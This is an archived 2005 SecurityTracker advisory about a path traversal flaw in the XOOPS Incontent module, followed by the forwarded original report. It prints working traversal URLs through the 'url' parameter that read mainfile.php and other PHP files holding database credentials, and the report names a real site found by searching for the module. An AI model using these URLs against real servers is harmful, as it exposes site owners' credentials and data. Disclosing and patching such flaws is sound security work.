SecurityTracker.com Archives - XOOPS Incontent Module Discloses PHP File Contents to Remote Users

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Forum/Board/Portal) > XOOPS Incontent Module

Vendors: Xoops.sourceforge.net

XOOPS Incontent Module Discloses PHP File Contents to Remote Users

SecurityTracker Alert ID: 1013034

SecurityTracker URL: http://securitytracker.com/id?1013034

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Jan 28 2005

Impact: Disclosure of system information, Disclosure of user information

Exploit Included: Yes

Description: A vulnerability was reported in the XOOPS third party Incontent module. A remote user can view the content of PHP files.

Lostmon forwarded a report of a vulnerability in the Incontent module. The module does not properly validate user-supplied input in the 'url' parameter. A remote user can view the contents of 'mainfile.php' with the following type of URL:

http://[target]/modules/incontent/index.php?op=aff&optio n=0&url=../../../mainfile.php

Other PHP files can be viewed, as shown in the following URLs:

http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../. ./index.php

http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../header.php

Impact: A remote user can view the contents of PHP files on the target server.

Solution: A patch is reportedly available at:

http://www.e-xoops.ru/modules/mydownloads/visit.php?lid=330

Cause: Access control error, Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Lostmon <lostmon@gmail.com>

Message History: None.

Source Message Contents

Date: Thu, 27 Jan 2005 14:19:44 +0100
From: Lostmon <lostmon@gmail.com>
Subject: Fwd: INCONTENT SECURITY ALEART!!

 
 
hello !!!
 
i receive this email yesterday 
 
atentamente
Lostmon
 
 
---------- Forwarded message ----------
From: webmaster@------.org <webmaster@------.org>
Date: Wed, 26 Jan 2005 18:02:56 +0100
Subject: INCONTENT SECURITY ALEART!!
To: lostmon@gmail.com
 
 
I Just recive the following information From Larok (Webmaster at the
RUSSISAN SUPPORT SITE) regarding the INCONTENT MODULE
 
If you are using INCONTENT YOU FIND A SECURITY FIX IN THIS INFORMATION TO:
 
info from Larok is here :
Hello.
 
Incontent module have big security bug.
 
With this bug hacker can see all data in mainfile.php & other *.php
portal files.
 
All data base data can be stolen.
 
How it works:
 
Just simpe search in google for sites that use incontent module i find
one of them:
 
http://www.dotcomdesigns.net/modules/incontent/
 
To view incontent files we use link like:
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=consult.html
 
We can easy look all data base data, pass, username and other by this
link in html:
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../mainfile.php
 
And different *.php files by this link like:
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../index.php
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../header.php
 
Path for this error here:
http://www.e-xoops.ru/modules/mydownloads/visit.php?lid=330
(Colosed for non registered)
 
Also must work on xoops portals were webmaster install this module.
Like this one:
 
http://[target]/modules/incontent/index.php?op=aff&option=0&url=../../../mainfile.php
 
Have a nice day.
 
 
-- 
La curiosidad es lo que hace mover la mente....

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2005, SecurityGlobal.net LLC